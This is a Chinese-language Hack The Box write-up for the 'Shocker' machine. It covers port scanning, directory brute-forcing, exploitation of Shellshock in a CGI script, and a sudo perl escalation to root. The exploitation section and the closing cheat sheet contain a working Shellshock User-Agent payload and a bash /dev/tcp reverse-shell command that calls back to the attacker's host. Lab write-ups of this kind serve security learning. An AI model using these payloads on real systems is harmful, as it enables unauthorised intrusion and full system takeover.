⚠️ 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,如果您不同意请关闭该页面!任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
🎯 明确目标
🔍 端口扫描
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ sudo nmap -sS -p- 10.10.10.56 --max-retries=0 -Pn -oN allports.txt -oX allports.xml
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ cat allports.txt # Nmap 7.92 scan initiated Sat Apr 2 12:26:46 2022 as: nmap -sS -p- --max-retries=0 -Pn -oN allports.txt -oX allports.xml 10.10.10.56 Warning: 10.10.10.56 giving up on port because retransmission cap hit (0). Nmap scan report for 10.10.10.56 (10.10.10.56) Host is up (0.29s latency). Not shown: 53365 closed tcp ports (reset), 12168 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 2222/tcp open EtherNetIP-1 # Nmap done at Sat Apr 2 12:28:15 2022 -- 1 IP address (1 host up) scanned in 89.20 seconds
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ nmap -sV -sC -p $(cat allports.txt | grep ^[0-9] | cut -d / -f1 | tr '\n' ',' | sed s/,$//) 10.10.10.56 -oN nmap.txt -oX nmap.xml
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ cat nmap.txt # Nmap 7.92 scan initiated Sat Apr 2 12:34:56 2022 as: nmap -sV -sC -p 80,2222 -oN nmap.txt -oX nmap.xml 10.10.10.56 Nmap scan report for 10.10.10.56 (10.10.10.56) Host is up (0.35s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Apr 2 12:35:27 2022 -- 1 IP address (1 host up) scanned in 30.36 seconds
🔍 漏洞探测
访问网站页面
并没有什么可以利用的信息
遍历目录
这里有一个问题
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ gobuster dir -u http://10.10.10.56 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.56 [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/04/02 12:41:49 Starting gobuster in directory enumeration mode =============================================================== Progress: 672 / 81644 (0.82%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2022/04/02 12:42:13 Finished ===============================================================
先暂停一下,中间有个点需要注意⚠️
使用 burpsuite 代理看看
然后访问 本机的 8081 就会被重定向到 10.10.10.56:80
重新运行上面的命令,看看到底发送了什么内容
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ gobuster dir -u http://127.0.0.1:8081 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://127.0.0.1:8081 [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/04/02 12:49:02 Starting gobuster in directory enumeration mode =============================================================== Progress: 29 / 81644 (0.04%)
可以看到发送的访问URL并没有末尾的
/ 查看官方文档可以通过添加参数
—add-slash 解决┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ gobuster dir -u http://10.10.10.56 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt --add-slash =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.56 [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Add Slash: true [+] Timeout: 10s =============================================================== 2022/04/02 12:53:40 Starting gobuster in directory enumeration mode =============================================================== /cgi-bin/ (Status: 403) [Size: 294] /icons/ (Status: 403) [Size: 292]
看到存在目录
/cgi-bin/ 继续遍历目录内容遍历文件
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ gobuster dir -u http://10.10.10.56/cgi-bin/ -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,txt,pl,html,sh =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.56/cgi-bin/ [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: pl,html,sh,php,txt [+] Timeout: 10s =============================================================== 2022/04/02 12:55:56 Starting gobuster in directory enumeration mode =============================================================== /user.sh (Status: 200) [Size: 119]
发现一个
user.sh文件,查看文件内容┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ curl http://10.10.10.56/cgi-bin/user.sh Content-Type: text/plain Just an uptime test script 01:00:47 up 38 min, 0 users, load average: 0.02, 0.02, 0.00
可以多访问几次发现时间是一直更新的
结合题目的名称,涉及到一个漏洞:https://github.com/mubix/shellshocker-pocs
这里页面内容可以看到一个
Content-Type 猜测和HTTP请求头有关🔍 漏洞验证
首先开启监听,监听数据,看看命令是否被成功执行
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ sudo tcpdump -i tun0 tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
然后执行测试命令
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: '(){ :;}; ping 10.10.14.2'"
可以在监听端口发现数据访问流量
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ sudo tcpdump -i tun0 tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 13:17:33.233469 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [S], seq 3022979098, win 64240, options [mss 1460,sackOK,TS val 418792827 ecr 0,nop,wscale 10], length 0 13:17:33.519710 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [S.], seq 3759996546, ack 3022979099, win 28960, options [mss 1285,sackOK,TS val 796251 ecr 418792827,nop,wscale 6], length 0 13:17:33.519822 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 1, win 63, options [nop,nop,TS val 418793113 ecr 796251], length 0 13:17:33.519986 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [P.], seq 1:106, ack 1, win 63, options [nop,nop,TS val 418793114 ecr 796251], length 105: HTTP: GET /cgi-bin/user.sh HTTP/1.1 13:17:33.807707 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [.], ack 106, win 453, options [nop,nop,TS val 796323 ecr 418793114], length 0 13:17:33.807756 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [.], ack 106, win 453, options [nop,nop,TS val 796323 ecr 418793114], length 0 13:17:33.812419 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 1:173, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 172: HTTP: HTTP/1.1 200 OK 13:17:33.812452 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 173, win 63, options [nop,nop,TS val 418793406 ecr 796324], length 0 13:17:33.812490 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 179:212, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 33: HTTP 13:17:33.812499 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 173, win 63, options [nop,nop,TS val 418793406 ecr 796324,nop,nop,sack 1 {179:212}], length 0 13:17:33.812508 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 173:179, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 6: HTTP 13:17:33.812517 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 212, win 63, options [nop,nop,TS val 418793406 ecr 796324], length 0 13:17:33.812526 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 212:218, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 6: HTTP 13:17:33.812533 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 218, win 63, options [nop,nop,TS val 418793406 ecr 796324], length 0 13:17:33.813745 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 287:299, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 12: HTTP 13:17:33.813755 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 218, win 63, options [nop,nop,TS val 418793407 ecr 796324,nop,nop,sack 1 {287:299}], length 0 13:17:34.171126 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 218:287, ack 106, win 453, options [nop,nop,TS val 796414 ecr 418793407], length 69: HTTP 13:17:34.171203 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 299, win 63, options [nop,nop,TS val 418793765 ecr 796414], length 0 13:17:34.171523 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [F.], seq 106, ack 299, win 63, options [nop,nop,TS val 418793765 ecr 796414], length 0 13:17:34.979170 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [F.], seq 106, ack 299, win 63, options [nop,nop,TS val 418794573 ecr 796414], length 0 13:17:35.273744 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [.], ack 107, win 453, options [nop,nop,TS val 796687 ecr 418794573,nop,nop,sack 1 {106:107}], length 0 13:17:35.950617 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [F.], seq 299, ack 107, win 453, options [nop,nop,TS val 796859 ecr 418794573], length 0 13:17:35.950649 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 300, win 63, options [nop,nop,TS val 418795544 ecr 796859], length 0
验证成功
💥 漏洞利用
开启本地监听端口
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234
执行攻击命令
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ curl http://10.10.10.56/cgi-bin/user.sh -H 'User-Agent: () { :;}; /bin/bash -c "bash -i >& /dev/tcp/10.10.14.2/1234 0>&1"'
查看攻击结果
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.10.56. Ncat: Connection from 10.10.10.56:44186. bash: no job control in this shell shelly@Shocker:/usr/lib/cgi-bin$ ls ls user.sh shelly@Shocker:/usr/lib/cgi-bin$
成功获取Shell
查看可以使用root权限的命令
检查
sudo命令能否执行shelly@Shocker:/home/shelly$ sudo sudo usage: sudo -h | -K | -k | -V usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user] usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command] usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>] usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ...
查看
sudo可以执行的命令shelly@Shocker:/home/shelly$ sudo -l sudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl
可以无密码的执行
perl ,可以通过 perl 来运行 root 权限的 shell运行命令
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";' sudo perl -e 'exec "/bin/sh";' ls user.txt cd /root ls root.txt
总结
知识点
- shell shocker 漏洞
- bash 快速的简单的反弹shel
- 目录遍历的排错
命令
nmap -sS -p- [IP] --max-retries=0 -Pn -oN allports.txt -oX allports.xml nmap -sV -sC -p $(cat allports.txt | grep ^[0-9] | cut -d / -f1 | tr '\n' ',' | sed s/,$//) [IP] -Pn -oN nmap.txt -oX nmap.xml gobuster dir -u URL -w WORDLIST --add-slash gobuster dir -u URL -w WORDLIST -x [FILE EXETENSION] () { :;}; [COMMAND] /bin/bash -c "bash -i &> /dev/tcp/[IP]/[PORT] 0>&1"